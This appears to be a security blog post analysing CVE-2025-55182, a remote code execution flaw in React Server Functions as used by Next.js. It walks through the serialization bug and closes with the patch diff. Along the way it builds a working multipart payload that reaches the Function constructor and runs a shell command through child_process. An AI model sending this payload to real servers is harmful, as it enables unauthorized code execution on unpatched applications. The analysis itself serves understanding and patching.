<!DOCTYPE html>
<html lang="zh-cn">
  <head>
    <meta charset="utf8"/>
    
    <meta name="viewport" content="initial-scale=1.0, width=device-width"/>
    <title>
      
        RSC远程代码执行漏洞 | apt-x
      
    </title>
    <meta name="description" content=""/>
    <meta name="keywords" content=""/>
    
      <link rel="apple-touch-icon"
            sizes="180x180"
            href="/images/apple-touch-icon.png"/>
    
    
      <link rel="icon"
            type="image/png"
            sizes="32x32"
            href="/images/favicon-32x32.png"/>
    
    
      <link rel="icon"
            type="image/png"
            sizes="16x16"
            href="/images/favicon-16x16.png"/>
    
    
      <link rel="mask-icon"
            href="/images/logo.svg"
            color=""/>
    
    
    
      
  <style>
    @font-face {
        font-family:sourceHanSerif;
        src: url(/font/normal.ttf);
        font-weight: normal;
    }
  </style>

  <style>
    @font-face {
        font-family:sourceHanSerif;
        src: url(/font/bold.ttf);
        font-weight: bold;
    }
  </style>


    
    <link rel="stylesheet"
          type="text/css"
          href='/css/layout.css'/>
    
    
  <link rel="stylesheet" type="text/css" href="/css/post.css"/>
  

  <meta name="generator" content="Hexo 8.1.1"></head>
  <body>
    
      <div id="search-mask" style="display:none">
  <div class="search-main" id="search-main">
    <div class="search__head">
      <div class="search-form">
        <svg t="1706347533072"
             class="icon"
             viewBox="0 0 1024 1024"
             version="1.1"
             xmlns="http://www.w3.org/2000/svg"
             p-id="7828"
             width="20"
             height="20">
          <path d="M685.6 660.336l155.152 155.168a16 16 0 0 1 0 22.624l-11.312 11.328a16 16 0 0 1-22.624 0l-158.528-158.544a289.792 289.792 0 0 1-165.152 51.36C322.336 742.256 192 611.904 192 451.12 192 290.336 322.336 160 483.136 160c160.784 0 291.12 130.336 291.12 291.136 0 82.112-33.984 156.272-88.672 209.2z m-202.464 33.92c134.272 0 243.12-108.848 243.12-243.12C726.256 316.848 617.408 208 483.136 208 348.848 208 240 316.848 240 451.136c0 134.272 108.848 243.12 243.136 243.12z" fill="#000000" p-id="7829">
          </path>
        </svg>
        <input id="search-input" placeholder="搜索文章">
        <svg t="1706361500528"
             id="search-clear"
             class="icon"
             viewBox="0 0 1024 1024"
             version="1.1"
             xmlns="http://www.w3.org/2000/svg"
             p-id="4351"
             width="20"
             height="20">
          <path d="M512 562.688l-264.2944 264.2944-50.688-50.688L461.312 512 197.0176 247.7056l50.688-50.688L512 461.312l264.2944-264.2944 50.688 50.688L562.688 512l264.2944 264.2944-50.688 50.688L512 562.688z" fill="#00" p-id="4352">
          </path>
        </svg>
      </div>
    </div>
    <div class="search__body" id="search-result"></div>
    <div class="search__foot"></div>
  </div>
</div>

    
    
    <div class=head>
      <div class="nav">
        <a href='/' class="nav-logo">
          <img alt="logo" height="60px" width="60px" src="/images/logo.svg"/>
        </a>
        <input id="navBtn" type="checkbox"/>
        <div class="nav-right">
          
            <div class="search-outer"><div class="search" id="search-btn">
  <svg t="1706347533072"
       class="icon"
       viewBox="0 0 1024 1024"
       version="1.1"
       xmlns="http://www.w3.org/2000/svg"
       p-id="7828"
       width="20"
       height="20">
    <path d="M685.6 660.336l155.152 155.168a16 16 0 0 1 0 22.624l-11.312 11.328a16 16 0 0 1-22.624 0l-158.528-158.544a289.792 289.792 0 0 1-165.152 51.36C322.336 742.256 192 611.904 192 451.12 192 290.336 322.336 160 483.136 160c160.784 0 291.12 130.336 291.12 291.136 0 82.112-33.984 156.272-88.672 209.2z m-202.464 33.92c134.272 0 243.12-108.848 243.12-243.12C726.256 316.848 617.408 208 483.136 208 348.848 208 240 316.848 240 451.136c0 134.272 108.848 243.12 243.136 243.12z" fill="#000000" p-id="7829"></path>
  </svg>
  <span>搜索</span>
  <span class="search-shortcut-key">Ctrl K</span>
</div></div>
          
          <div class="nav-menu">
            
              
                <a class="nav-menu-item" href="/dev">Dev</a>
              
                <a class="nav-menu-item" href="/sec">Sec</a>
              
            
            
          </div>
        </div>
        <label class="nav-btn" for="navBtn"></label>
      </div>
    </div>
    <div class="body">
      
  <article class="post-content">
    <div class="post-inner">
      <div class="post-content__head">
        <div class="post-title">RSC远程代码执行漏洞</div>
        <div class="post-info">
          
  


          <span class="post-date">2025-12-07</span>
        </div>
      </div>
      
      <div class="post-content__body">
        
          <div class="post-gallery">
            
          </div>
        
        <h1 id="CVE-2025-55182"><a href="#CVE-2025-55182" class="headerlink" title="CVE-2025-55182"></a>CVE-2025-55182</h1><p>This vulnerability allows RCE in React Server Functions, e.g. as<br>offered by Next.js through insecure prototype references.</p>
<p>I’m not an expert in React or Next.js, so take all the information<br>here with a grain of salt.</p>
<h2 id="Background"><a href="#Background" class="headerlink" title="Background"></a>Background</h2><p>React offers Server Functions<a target="_blank" rel="noopener" href="https://react.dev/reference/rsc/server-functions">^1</a>, which can be seen as sort of an RPC-<br>over-HTTP. They can be used to fetch data from adjacent peers to ensure<br>low latency, or perform authenticated requests that the client lacks<br>credentials for.</p>
<p>React uses something called the React Flight Protocol<a target="_blank" rel="noopener" href="https://tonyalicea.dev/blog/understanding-react-server-components/">^2</a> for serialization<br>of values passed to Server Functions.</p>
<p>The client passes “chunks” to the server, e.g. via form data:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;[&quot;$1&quot;]&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;object&quot;:&quot;fruit&quot;,&quot;name&quot;:&quot;$2:fruitName&quot;&#125;&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;2&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;fruitName&quot;:&quot;cherry&quot;&#125;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>As shown, these can have references in between each other.<br>The above payload deserializes to the following on the server:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123; <span class="attr">object</span>: <span class="string">&#x27;fruit&#x27;</span>, <span class="attr">name</span>: <span class="string">&#x27;cherry&#x27;</span> &#125;</span><br></pre></td></tr></table></figure>

<p>The format itself is a little more intricate and allows for more<br>complex serialization and deserialization, but this provides a<br>basic understanding for the actual vulnerability.</p>
<h2 id="Vulnerability"><a href="#Vulnerability" class="headerlink" title="Vulnerability"></a>Vulnerability</h2><p>Until this commit<a target="_blank" rel="noopener" href="https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d">^3</a>, when traversing chunks in reference resolving,<br>such as getting the <code>fruitName</code> from chunk 2 in the above example, React<br>didn’t verify whether the requested key was actually set on the object.<br>This allowed us to get the object prototype<a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Learn_web_development/Extensions/Advanced_JavaScript_objects/Object_prototypes">^4</a>.</p>
<p>This can be demonstrated with a payload like this:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;[&quot;$1:__proto__:constructor:constructor&quot;]&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;x&quot;:1&#125;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Which deserializes to the function constructor<a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/Function">^5</a>:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[<span class="title class_">Function</span>: <span class="title class_">Function</span>]</span><br></pre></td></tr></table></figure>

<p>When the chunk with ID 0 is not an array but an object, we can<br>set the <code>then</code> key to the function constructor. The object is then<br>returned by the <code>decodeReplyFromBusboy</code> function and awaited by Next.js:</p>
<figure class="highlight ts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// action-handler.ts:888 (pre-patch)</span></span><br><span class="line">boundActionArguments = <span class="keyword">await</span> <span class="title function_">decodeReplyFromBusboy</span>(</span><br><span class="line">    busboy,</span><br><span class="line">    serverModuleMap,</span><br><span class="line">    &#123; temporaryReferences &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>When this returns a thenable, the <code>await</code> in the caller will call it.<br>This is what happens with this payload:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;then&quot;:&quot;$1:__proto__:constructor:constructor&quot;&#125;&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;x&quot;:1&#125;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Leading to this error:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SyntaxError: Unexpected token &#x27;function&#x27;</span><br><span class="line">    at Object.Function [as then] (&lt;anonymous&gt;) &#123;</span><br><span class="line">      digest: &#x27;1259793845&#x27;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>The error looks like this since V8 calls an <code>await</code>ed function<br>with the internal <code>resolve</code> and <code>reject</code> functions, which, when<br><code>toString</code>ed, serialize to something like this:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> (<span class="params"></span>) &#123; [native code] &#125;</span><br></pre></td></tr></table></figure>

<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Since we can trivially retrieve the <code>Function</code> constructor, the<br>straightforward way is to find a call gadget that invokes the<br>constructor with a user-controlled value (i.e., the code of the<br>function as a string), and later calls the returned function.</p>
<p>There are multiple places that can call the function constructor,<br>for example <code>resolveServerReference</code>, where <code>id</code> is a controlled object,<br>and <code>lastIndexOf</code> can be overwritten to return a user-controlled string<br>(e.g. via <code>Array.prototype.join</code>) and <code>slice</code> can be overwritten to the<br>function constructor. However, this place doesn’t work as the second<br>invocation of <code>.slice()</code> supplies a number as the first argument,<br>which -to my best knowledge- can never be handled by the function<br>constructor.</p>
<p>Here, a brilliant idea from maple3142<a target="_blank" rel="noopener" href="https://x.com/maple3142">^6</a> comes in. When <code>getChunk</code><br>grabs the chunk at ID 0 as the root reference to start resolving the<br>reference chain, <em>this very same chunk</em> can resolve to a crafted<br>“fake chunk”.</p>
<p>We can reference the crafted chunk 0 in chunk 1 by using the<br><code>$@</code> syntax, which returns the “raw” chunk, not it’s resolved value:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&quot;@&quot;</span>:</span><br><span class="line">  <span class="keyword">return</span> (</span><br><span class="line">    (obj = <span class="built_in">parseInt</span>(value.<span class="title function_">slice</span>(<span class="number">2</span>), <span class="number">16</span>)), <span class="title function_">getChunk</span>(response, obj)</span><br><span class="line">  );</span><br></pre></td></tr></table></figure>

<p>Combining this with our <code>then</code> overwrite from above, we can craft<br>something like this:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;then&quot;: &quot;$1:__proto__:then&quot;&#125;&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&quot;$@0&quot;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Here, chunk 0 overwrites its own <code>.then()</code> with the <code>.then()</code> of<br>its own raw chunk representation. Put simply, we overwrite our<br>own <code>.then()</code> with <code>Chunk.prototype.then</code>, which exists, since<br><code>Chunk</code>s are thenables:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Chunk</span>.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">then</span> = <span class="keyword">function</span> (<span class="params">resolve, reject</span>) &#123;</span><br><span class="line">      <span class="keyword">switch</span> (<span class="variable language_">this</span>.<span class="property">status</span>) &#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&quot;resolved_model&quot;</span>:</span><br><span class="line">          <span class="title function_">initializeModelChunk</span>(<span class="variable language_">this</span>);</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// ...</span></span><br></pre></td></tr></table></figure>

<p>With the above payload, <code>Chunk.prototype.then</code> is eventually called<br>with the crafted chunk with ID 0.</p>
<p>As shown above, when <code>.status</code> on our fake chunk is <code>resolved_model</code>:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&#123;&quot;then&quot;: &quot;$1:__proto__:then&quot;, &quot;status&quot;: &quot;resolved_model&quot;&#125;&#x27;</span>),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&quot;$@0&quot;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>We get into <code>initializeModelChunk</code>. Here, <code>.value</code> is parsed as JSON,<br>and then references are resolved on the returned object, using the “outer”<br>context of our chunks with IDs 0 and 1:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">initializeModelChunk</span>(<span class="params">chunk</span>) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">var</span> rawModel = <span class="title class_">JSON</span>.<span class="title function_">parse</span>(resolvedModel),</span><br><span class="line">        value = <span class="title function_">reviveModel</span>(chunk.<span class="property">_response</span>, &#123; <span class="string">&quot;&quot;</span>: rawModel &#125;, <span class="string">&quot;&quot;</span>, rawModel, rootReference);</span><br><span class="line">    <span class="comment">// ...</span></span><br></pre></td></tr></table></figure>

<p>Within this, we now get a second pass of evaluation with a little more<br>values we have access to due to the outer context already being resolved.</p>
<p>There is a call gadget in the handling of blob data with the <code>$B</code> prefix<br>in the flight protocol:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&quot;B&quot;</span>:</span><br><span class="line">  <span class="keyword">return</span> (</span><br><span class="line">    (obj = <span class="built_in">parseInt</span>(value.<span class="title function_">slice</span>(<span class="number">2</span>), <span class="number">16</span>)),</span><br><span class="line">    response.<span class="property">_formData</span>.<span class="title function_">get</span>(response.<span class="property">_prefix</span> + obj)</span><br><span class="line">  );</span><br></pre></td></tr></table></figure>

<p>Using the special <code>_response</code> field, we control the <code>response</code> property<br>of the crafted chunk:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// in initializeModelChunk</span></span><br><span class="line">value = <span class="title function_">reviveModel</span>(chunk.<span class="property">_response</span>, <span class="comment">// ...</span></span><br></pre></td></tr></table></figure>

<p>With this, we can craft an object with fake <code>._formData</code> and <code>._prefix</code><br>properties:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">crafted_chunk = &#123;</span><br><span class="line">    <span class="string">&quot;then&quot;</span>: <span class="string">&quot;$1:__proto__:then&quot;</span>,</span><br><span class="line">    <span class="string">&quot;status&quot;</span>: <span class="string">&quot;resolved_model&quot;</span>,</span><br><span class="line">    <span class="string">&quot;reason&quot;</span>: -<span class="number">1</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&#x27;&#123;&quot;then&quot;: &quot;$B0&quot;&#125;&#x27;</span>,</span><br><span class="line">    <span class="string">&quot;_response&quot;</span>: &#123;</span><br><span class="line">        <span class="string">&quot;_prefix&quot;</span>: <span class="string">f&quot;return foo; // &quot;</span>,</span><br><span class="line">        <span class="string">&quot;_formData&quot;</span>: &#123;</span><br><span class="line">            <span class="string">&quot;get&quot;</span>: <span class="string">&quot;$1:constructor:constructor&quot;</span>,</span><br><span class="line">        &#125;,</span><br><span class="line">    &#125;,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>The <code>.reason</code> needs to be added to circumvent failing on the <code>toString</code><br>invocation in &#96;initializeModelChunk:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> rootReference = -<span class="number">1</span> === chunk.<span class="property">reason</span> ? <span class="keyword">void</span> <span class="number">0</span> : chunk.<span class="property">reason</span>.<span class="title function_">toString</span>(<span class="number">16</span>), resolvedModel = chunk.<span class="property">value</span>;</span><br></pre></td></tr></table></figure>

<p>By pointing <code>._formData</code> to the function constructor, and <code>._prefix</code> to<br>our code, we get an invocation gadget for the function constructor in<br>the blob deserialization:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">response.<span class="property">_formData</span>.<span class="title function_">get</span>(response.<span class="property">_prefix</span> + <span class="string">&quot;0&quot;</span>)</span><br><span class="line"><span class="comment">// becomes</span></span><br><span class="line"><span class="title class_">Function</span>(<span class="string">&quot;return foo; // 0&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>Our crafted function is then returned by <code>parseModelString</code> as the<br><code>.then()</code> method of the crafted chunk, which is also awaited, since<br>all of this takes place in a single promise resolving chain. Thus,<br>returning a thenable, our crafted function gets called. This constitutes<br>the required call gadget referenced above.</p>
<p>Putting this all together with an actual RCE payload, we get something<br>like this:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">crafted_chunk = &#123;</span><br><span class="line">    <span class="string">&quot;then&quot;</span>: <span class="string">&quot;$1:__proto__:then&quot;</span>,</span><br><span class="line">    <span class="string">&quot;status&quot;</span>: <span class="string">&quot;resolved_model&quot;</span>,</span><br><span class="line">    <span class="string">&quot;reason&quot;</span>: -<span class="number">1</span>,</span><br><span class="line">    <span class="string">&quot;value&quot;</span>: <span class="string">&#x27;&#123;&quot;then&quot;: &quot;$B0&quot;&#125;&#x27;</span>,</span><br><span class="line">    <span class="string">&quot;_response&quot;</span>: &#123;</span><br><span class="line">        <span class="string">&quot;_prefix&quot;</span>: <span class="string">f&quot;process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;calc&#x27;);&quot;</span>,</span><br><span class="line">        <span class="string">&quot;_formData&quot;</span>: &#123;</span><br><span class="line">            <span class="string">&quot;get&quot;</span>: <span class="string">&quot;$1:constructor:constructor&quot;</span>,</span><br><span class="line">        &#125;,</span><br><span class="line">    &#125;,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">    <span class="string">&quot;0&quot;</span>: (<span class="literal">None</span>, json.dumps(crafted_chunk)),</span><br><span class="line">    <span class="string">&quot;1&quot;</span>: (<span class="literal">None</span>, <span class="string">&#x27;&quot;$@0&quot;&#x27;</span>),</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>The bonus, which makes this vulnerability even worse, is that all of this<br>happens during deserialization, before the requested action is first validated<br>in <code>getActionModIdOrError</code>. Thus, setting a header like <code>Next-Action: foo</code> is<br>sufficient to trigger the vulnerability.</p>
<h2 id="Patch"><a href="#Patch" class="headerlink" title="Patch"></a>Patch</h2><p>Using the chunk references to retrieve prototype properties is<br>fixed with this check:</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -78,7 +80,10 @@</span> export function preloadModule&lt;T&gt;(</span><br><span class="line"> </span><br><span class="line"> export function requireModule&lt;T&gt;(metadata: ClientReference&lt;T&gt;): T &#123;</span><br><span class="line">   const moduleExports = parcelRequire(metadata[ID]);</span><br><span class="line"><span class="deletion">-  return moduleExports[metadata[NAME]];</span></span><br><span class="line"><span class="addition">+  if (hasOwnProperty.call(moduleExports, metadata[NAME])) &#123;</span></span><br><span class="line"><span class="addition">+    return moduleExports[metadata[NAME]];</span></span><br><span class="line"><span class="addition">+  &#125;</span></span><br><span class="line"><span class="addition">+  return (undefined: any);</span></span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>


      </div>
    </div>
    
      <script src='https://unpkg.com/mermaid@latest/dist/mermaid.min.js'></script>
      <script>
        if (window.mermaid) {
          mermaid.initialize({"startOnload":true});
        }
      </script>
    
  </article>
  <div class="post__foot">
    
    <div class="post-nav">
  
    <div class="post-nav-item-left"></div>
  
  <div class="vhr"></div>
  
    <a class="post-nav-item-right" href="/2025/07/08/Ollama-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E-CNVD-2025-04094/">
      <div class="text-align">
        <span class="text-small">下一篇</span>
        <svg t="1670570876164"
             class="icon"
             viewBox="0 0 1024 1024"
             transform="scale(-1,-1)"
             width="16"
             height="16">
          <path d="M384 512L731.733333 202.666667c17.066667-14.933333 19.2-42.666667 4.266667-59.733334-14.933333-17.066667-42.666667-19.2-59.733333-4.266666l-384 341.333333c-10.666667 8.533333-14.933333 19.2-14.933334 32s4.266667 23.466667 14.933334 32l384 341.333333c8.533333 6.4 19.2 10.666667 27.733333 10.666667 12.8 0 23.466667-4.266667 32-14.933333 14.933333-17.066667 14.933333-44.8-4.266667-59.733334L384 512z" p-id="14596" />
        </svg>
      </div>
      Ollama 未授权访问漏洞 CNVD-2025-04094
    </a>
  
</div>

    
    
  </div>

    </div>
    <div class="foot">
  <div class="foot-inner">
    <div class="foot__head">
      
        <div class="foot-line">
          <div class="matts">想</div><div class="matts">要</div><div class="matts">走</div><div class="matts">上</div><div class="matts">那</div><div class="matts">条</div><div class="matts">路</div>
        </div>
      
        <div class="foot-line">
          <div class="matts">就</div><div class="matts">要</div><div class="matts">先</div><div class="matts">成</div><div class="matts">为</div><div class="matts">那</div><div class="matts">条</div><div class="matts">路</div>
        </div>
      
    </div>
    <div class="foot__body">
      
        <div class="foot-item">
          <div class="foot-item__head">朋友</div>
          <div class="foot-item__body">
            
            


  
  
    <div class="foot-link-group">
      
        
        
          <div class="text">
            <img alt="link"
                 height="20px"
                 width="20px"
                 src="/images/icon/icon-link.svg" />
            <a class="foot-link" target="_blank" rel="noopener" href="https://apt-x.cn">apt-x</a>
          </div>
        
      
        
        
          <div class="text">
            <img alt="link"
                 height="20px"
                 width="20px"
                 src="/images/icon/icon-link+.svg" />
            <a class="foot-link" href="mailto:0xd0e0@gmail.com?subject=申请http://example.com的友链">申请友链</a>
          </div>
        
      
        
        
      
        
        
      
    </div>
  


          </div>
        </div>
      
      
        <div class="foot-item">
          <div class="foot-item__head">账号</div>
          <div class="foot-item__body">
            


  
  
    <div class="foot-link-group">
      
        
        
          <div class="text">
            <img alt="link"
                 height="20px"
                 width="20px"
                 src="/images/logo-github.svg" />
            <a class="foot-link" target="_blank" rel="noopener" href="https://github.com/0xd0e0">0xd0e0</a>
          </div>
        
      
        
        
      
        
        
      
        
        
      
    </div>
  


          </div>
        </div>
      
      <div class="foot-item">
        <div class="foot-item__head">联系</div>
        <div class="foot-item__body">
          


  
  
    <div class="foot-link-group">
      
        
        
          <div class="text">
            <img alt="link"
                 height="20px"
                 width="20px"
                 src="/images/icon/icon-email.svg" />
            <a class="foot-link" href="0xd0e0@gmail.com">0xd0e0@gmail.com</a>
          </div>
        
      
        
        
      
        
        
      
        
        
      
    </div>
  


        </div>
      </div>
    </div>
    <div class="copyright">
      <a href="http://example.com">apt-x</a> &nbsp;|&nbsp;由&nbsp;<a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>&nbsp;及&nbsp;
      <svg width="20" height="20" viewBox="0 0 725 725">
        <path fill-rule="evenodd" fill="rgb(221, 221, 221)" d="M145.870,236.632 L396.955,103.578 L431.292,419.44 L156.600,522.53 L145.870,236.632 Z" />
        <path fill-rule="evenodd" fill="rgb(159, 159, 159)" d="M396.955,103.578 L564.345,234.486 L611.558,513.469 L431.292,419.44 L396.955,103.578 Z" />
        <path fill-rule="evenodd" fill="rgb(0, 0, 0)" d="M431.292,419.44 L611.558,513.469 L358.327,595.18 L156.600,522.53 L431.292,419.44 Z" />
      </svg>
      <a target="_blank" rel="noopener" href="https://github.com/hooozen/hexo-theme-tranquility">致远</a>&nbsp;驱动
    </div>
  </div>
</div>

    
    
      <script src="/js/search.js"></script>
      <script>
        searchInitialize("/search.json")
      </script>
    
    <script src="/js/copy-code.js"></script>
    
  

  </body>
</html>